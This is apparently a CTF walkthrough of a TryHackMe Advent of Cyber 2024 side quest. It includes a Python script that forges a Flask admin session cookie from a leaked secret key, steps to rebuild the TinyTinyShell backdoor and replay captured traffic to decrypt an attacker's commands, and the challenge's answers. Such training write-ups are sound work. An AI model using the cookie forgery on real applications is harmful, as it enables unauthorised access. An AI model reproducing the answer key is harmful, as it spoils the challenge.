Advent of Cyber SQ1 Walkthrough

Advent of Cyber Side Quest n.1

Intro

On the TryHackMe (THM) platform, a CTF called Advent of Cyber 2024 is currently underway. However, a more intriguing underground CTF is taking place as well, known as the Side Quests, also referred to as the Advent of Cyber 2024 Side Quests.

Let’s dive into the first one together!

Ransomware Note #1


  1. Download the zip file: http://MACHINE_IP/aoc_sq_1.zip
  2. You will need to find the L1 keycard to discover the password for that zip.
    • The L1 keycard is likely in Day 1, judging by other players on the scoreboard.
    • In the Day 1 task there is a C2 machine, and there is also:
      • app.secret_key = @09JKD0934jd712?djD
    • With that we can use flask-unsign or the Flask cookie script (see Fragments).
    • Now we should be able to view the C2 interface, where the L1 Keycard will be.
  3. Unzip aoc_sq_1.zip and analyze it using Wireshark:
    • At this stage, you should be able to answer two of the questions (1 and 2).
  4. There is also other interesting communication, especially in frame n.153456.
  5. Identify two binaries:

    ff
    exp_file_credential

  6. By identifying them we found a tool called TinyTinyShell.

Retrieve encrypted data

  • The data, as we can see, was encrypted using the tool TinyTinyShell that we already identified.
  1. We need to download this tool to decrypt the original traffic:

    git clone https://github.com/mame82/ls19_tsh_mod.git

  2. We need to comment out lines 497 to 500 in tshd.c, otherwise the script will stop.
  3. We need to make some changes in tsh.h: secret, port and CONNECT_BACK_HOST:

    char *secret = "SuP3RSeCrEt";
    #define SERVER_PORT 9001
    short int server_port = SERVER_PORT;
    #define CONNECT_BACK_HOST "localhost"


    I found the secret SuP3RSeCrEt using Ghidra on the file ff; you can also find it with strings -n 7.

  4. We need to build binary:
    make linux
  5. We need to launch it and keep it opened:
    ./tshd -s SuP3RSeCrEt -p 9001
  6. We extract the attacker's side of the communication so we can replay it into the listener:
    tshark -r traffic.pcap -Y "tcp.stream eq 73832 && ip.src != 10.10.103.220" -T fields -e data | xxd -r -p > attacker
  7. We replay this communication to retrieve the commands:
    cat attacker | nc 127.0.0.1 9001
  8. Now we have everything we need.

Fragments

L1 Keycard

from flask.sessions import SecureCookieSessionInterface
from flask import Flask

app = Flask(__name__)
# the secret_key leaked in the Day 1 task
app.secret_key = "@09JKD0934jd712?djD"

# use Flask's own session signer so the cookie has exactly the format the C2 expects
session_interface = SecureCookieSessionInterface()
signer = session_interface.get_signing_serializer(app)

# session contents to forge; these keys are a guess at what the C2 checks
session_data = {'logged_in': True, 'username': 'admin'}
cookie = signer.dumps(session_data)
print(cookie)
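The script above works because anyone holding secret_key can mint a signature the server accepts. The following added example (my own stdlib re-implementation of the Flask/itsdangerous cookie scheme, not code from the post or from the C2) signs and verifies such cookies, so you can check whether a captured cookie validates under the leaked key and see that rotating the key, or tampering with the cookie, makes it fail; the session contents and the timestamp are assumptions.

```python
import base64, hashlib, hmac, json, time, zlib
from typing import Optional

SALT = b"cookie-session"                  # fixed salt Flask passes to itsdangerous
LEAKED_KEY = "@09JKD0934jd712?djD"        # app.secret_key leaked in the Day 1 task

def b64e(raw: bytes) -> str:
    # URL-safe base64 without padding, as itsdangerous emits it
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

def b64d(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def derive_key(secret_key: str) -> bytes:
    # itsdangerous "hmac" key derivation: HMAC-SHA1(secret_key, salt)
    return hmac.new(secret_key.encode(), SALT, hashlib.sha1).digest()

def sign_session(secret_key: str, data: dict, ts: Optional[int] = None) -> str:
    """Mint a Flask-style session cookie: <payload>.<timestamp>.<signature>."""
    payload = json.dumps(data, separators=(",", ":"), sort_keys=True).encode()
    packed = zlib.compress(payload)       # a leading "." marks a zlib-compressed payload
    body = "." + b64e(packed) if len(packed) < len(payload) - 1 else b64e(payload)
    stamp = int(time.time()) if ts is None else ts
    signed = body + "." + b64e(stamp.to_bytes((stamp.bit_length() + 7) // 8, "big"))
    sig = hmac.new(derive_key(secret_key), signed.encode(), hashlib.sha1).digest()
    return signed + "." + b64e(sig)

def verify_session(secret_key: str, cookie: str, max_age: Optional[int] = None,
                   now: Optional[int] = None) -> Optional[dict]:
    """Return the session dict if the cookie validates under secret_key, else None."""
    signed, _, sig = cookie.rpartition(".")
    if not signed:
        return None
    expected = hmac.new(derive_key(secret_key), signed.encode(), hashlib.sha1).digest()
    if not hmac.compare_digest(b64e(expected).encode(), sig.encode()):
        return None                       # wrong key, or payload/timestamp tampered with
    body, _, stamp_b64 = signed.rpartition(".")
    try:
        stamp = int.from_bytes(b64d(stamp_b64), "big")
        if max_age is not None and (int(time.time()) if now is None else now) - stamp > max_age:
            return None                   # valid signature but expired
        raw = b64d(body[1:]) if body.startswith(".") else b64d(body)
        return json.loads(zlib.decompress(raw) if body.startswith(".") else raw)
    except (ValueError, zlib.error):
        return None

if __name__ == "__main__":
    cookie = sign_session(LEAKED_KEY, {"logged_in": True, "username": "admin"})
    print(cookie, verify_session(LEAKED_KEY, cookie), verify_session("rotated", cookie))
```

Once the key is rotated, every cookie minted under the old one stops validating, which is the practical remediation for a leaked secret_key.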

Questions & Answers

  1. What is the password the attacker used to register on the site?
    • QU9DMjAyNHtUaW55X1R
    • I found this password thanks to an HTTP POST in Wireshark (http.request.method == "POST") in frame 153213
    • The username used was frostyfox
  2. What is the password that the attacker captured?
    • pbnlfVGlueV9TaDNsbF
    • In frame n.153506, also an HTTP POST
    • The username was mcskidy
  3. What is the password of the zip file transferred by the attacker?
    • 9jYW5fRW5jcnlwVF9iVXR
  4. What is McSkidy’s password that was inside the database file stolen by the attacker?
    • faXRfSXNfTjB0X0YwMGxwcm8wZn0=

Easter Egg: answers: 1 + 2 + 3 + 4 = base64 😉

This post is licensed under CC BY 4.0 by the author.